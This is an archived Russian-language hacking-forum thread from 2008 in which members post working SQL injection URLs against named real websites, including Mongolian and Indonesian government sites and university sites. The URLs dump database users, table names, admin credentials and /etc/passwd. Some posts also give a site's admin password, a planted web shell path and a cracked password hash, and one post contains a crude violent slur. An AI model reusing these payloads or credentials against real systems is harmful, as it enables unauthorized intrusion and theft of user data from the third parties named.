ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.08.2008, 05:16
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Начинаю осваиваться 
facasper.com.br (какой-то Бразильский сайт)
Код:
http://www.facasper.com.br/jo/unotas.php?sub_categoria=-16+union+select+1,2,3,concat_ws(version(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
user - logjo-new@herzog-new.fcl.com.br
version - 5.0.24a-standard
Таблицы (from information_schema):
Код:
http://www.facasper.com.br/jo/unotas.php?sub_categoria=-16+union+select+1,2,3,concat_ws(table_name,table_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables/*
Раскрытие пути:
Код:
/usr/local/apache/htdocs/facasper.com.br/pos/nucleo_pesquisa/edicao/conexao/
Последний раз редактировалось USAkid; 04.08.2008 в 05:19..
|
|
|
04.08.2008, 10:19
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
.edu
Код:
http://www.msse.umn.edu/alumni_calendar.php?id=199'union+select+1,2,unhex(hex(concat_ws(version(),0x3a,user()))),4,5,6,7,8,9,10/*
version - 5.0.18
user - umsec@sabinus.cs.umn.edu
Юзеров с паролями не нашел, т.к. то таблицы нет, то доступ запрещен.
P.S: отдельная благодарность aka PSIH, sabe и Ershik за помощь с функциями кодировки
|
|
|
|
04.08.2008, 19:23
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Riptopia.com - PR 5
http://www.riptopia.com/news.php?id=1'+union+select+1,2,version(),4,5,6/*
5 ветка.... и нече интересного в базе..
http://www.riptopia.com/news.php?id=1'+union+select+1,2,load_file(0x2F6574 632F706173737764),4,5,6/*
это уже интереснее..
Tv-live.ro
http://www.tv-live.ro/radio-live.php?id=-1+union+select+1,version(),3,4,5,6/*
Bugstrainingcenter.com
http://www.bugstrainingcenter.com/webring.php?id=-1+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables
5 ветка и таблы... но сам сайт очень медленый..
http://www.bugstrainingcenter.com/webring.php?id=-1+union+select+1,2,3,username,pass,6+from+user
Metabras.ro
http://www.metabras.ro/news.php?id=-62+union+select+1,version(),3,4,5,6,7,8--
Ghanadate.co.uk
http://www.ghanadate.co.uk/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),version(),5,6,7 ,8,9,10/**/from/**/members/*
Scarsdalecoops.com
http://scarsdalecoops.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0,0,0,concat_ws(0x3a,username, password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*
Sb-fitnes.net
http://sb-fitnes.net/trainers.php?t=2&ID=-1%20union%20select%201,2,concat_ws(0x22,table_name ,column_name),4,5,6,7,8,9,10,11%20from%20informati on_schema.columns%20limit%201%20offset%20213--
Danielletaaffe.com
http://www.danielletaaffe.com/shop.php?id=154&cat=47&action=shop&contentid=3%20u nion%20all%20select%201,2,concat_ws(0x2020203a2020 203c62723e,table_name,table_schema),4,5,6,7+from+i nformation_schema.tables
Последний раз редактировалось sabe; 06.08.2008 в 09:39..
|
|
|
|
05.08.2008, 01:14
|
|
Новичок
Регистрация: 04.08.2008
Сообщений: 2
Провел на форуме:
14733
Репутация:
3
|
|
http://pravostok.ru/adm/
admin:Cr#27Ma
шелл
http://pravostok.ru/uploaded/Alaska/148.php
http://pravostok.ru/ru/updates/index.php?from=10&id=-%2099999+union+select+1,2,concat_ws(0x3a,ADMINISTR ATOR_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,%20%201 1,12,13,14+from+ADMINISTRATOR/*
посмотрите пожалуйста что там и как
|
|
|
|
05.08.2008, 18:06
|
|
Новичок
Регистрация: 04.08.2008
Сообщений: 5
Провел на форуме:
42276
Репутация:
10
|
|
Помогите с http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
Названия таблиц выводятся, но при попытке вывести данные
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,2,3,concat_ws(0x3a,name,member _login_key)+from+ibf_members+limit+0,1/*
автоматически добавляет site.news к названию таблицы, и пишет что такой то таблицы нету
|
|
|
|
05.08.2008, 18:44
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.mongoliatourism.gov.mn
4 ветка,полей для вывода нет,нашел нефильтруемый параметр id в index.php и download.php
есть табличка users с колонками id,name,pass
http://www.mongoliatourism.gov.mn/download.php?id=7+and+1=if(ascii(substring((select +concat(name,pass)+from+users+limit+0,1),1,1))>1,1 ,0)/*
http://www.must-library.edu.mn
Очень бажный сайт,
3 версия мускула...
http://www.must-library.edu.mn/web-page/index.php?top_id=2&id=2'+and+3=substring(version() ,1,1)/*
Последний раз редактировалось MirA; 05.08.2008 в 19:30..
|
|
|
|
05.08.2008, 19:55
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Chemeng.technion.ac.il - PR 6
http://chemeng.technion.ac.il/person_page.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13/*
Spatialinformationdesignlab.org - PR 6
columbia university organization
http://www.spatialinformationdesignlab.org/projects.php?id=-16+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,32,33,34/*
Pzb.com.pl - PR 4
http://www.pzb.com.pl/index.php?co=wiecej&id=521&dzial=96%20and%201=2%20 union%20select%201,2,version(),4,5,6,7,8/*
Infokom-sulteng.go.id - PR 3
http://www.infokom-sulteng.go.id/cetakberita.php?id=-641+union+select+1,2,3,table_name,5+from+informati on_schema.tables+limit+17,1--
5 ver. tables..
http://www.infokom-sulteng.go.id/cetakberita.php?id=-641+union+select+1,2,3,unhex(hex(concat_ws(0x3a,us ername,password))),5+from+infokom_infokom.bktmst_a uth--
Mojmac.com
http://www.mojmac.com/clanek.php?id=-38+union+select+1,2,version(),4,5,6,7,8/*
Cashsavings2003.com
http://www.cashsavings2003.com/category.php?id=-1+union+select+all+1,2,3,4,version(),6,7,8,9,10,11--
Cowcanfly
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,table_name,3,table_schema+from+i nformation_schema.tables/*
сморим таблицы... и базы в которых они находятся..
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,unhex(hex(concat_ws(0x3a,name, member_login_key))),3,4+from+forum.ibf_members/*
а вот и все юзеры.. )
Последний раз редактировалось sabe; 06.08.2008 в 10:09..
|
|
|
|
06.08.2008, 00:44
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
Провел на форуме:
109513
Репутация:
52
|
|
http://www.disasterinfo.mn
version() = 5.0.22-Debian_0ubuntu6.06-log
user() = root@localhost
database() = forum
смотрим все таблички
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_name,3 ,4,5+from+information_schema.tables/*
теперь смотрим все базы
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_schema ,3,4,5+from+information_schema.tables/*
есть хорошие таблички disasterinfo.users, main_data2.admin
так же есть доступ к mysql.user
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,user,password),3,4,5+from+mysql.user/*
есть права на чтение файлов)
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,2,load_file( 0x2f6574632f706173737764),4,5+from+main_data2.admi n/*
переходим к таблицам...
таблица с админами:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,id,name,pass,email),3,4,5+from+main_data2.admin/*
таблица с юзерами :
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,nickname,password),3,4,5+from+disasterinfo.user s/*
админка тут http://www.disasterinfo.mn/admin/
прекрасная база,для тренировки новичкам)
спасибо за внимание)
|
|
|
|
06.08.2008, 03:36
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.haers.ru/index.php?page=86&id=-1+union+select+1,2,3,4,5,concat(0x3a3a,login_user, 0x3a3a,pass_user),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30+from+haers.us er+limit+30,190
login ->dom0744
pass ->d6a4f42b2ef93aa0f440ebcfe24a3351 ->fylhtq
Админится через CP, хер расковырял =((, фурычит load_file, насчет outfile х*й понял.
Пускай админа отдерет негр, как последнюю девку!
|
|
|
|
06.08.2008, 09:04
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Сообщение от sabe
Activetoy.co.uk - PR 3
хватит постить одно и тоже каждый день! 
http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum .antichat.ru+Activetoy.co.uk+&btnG=Search
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
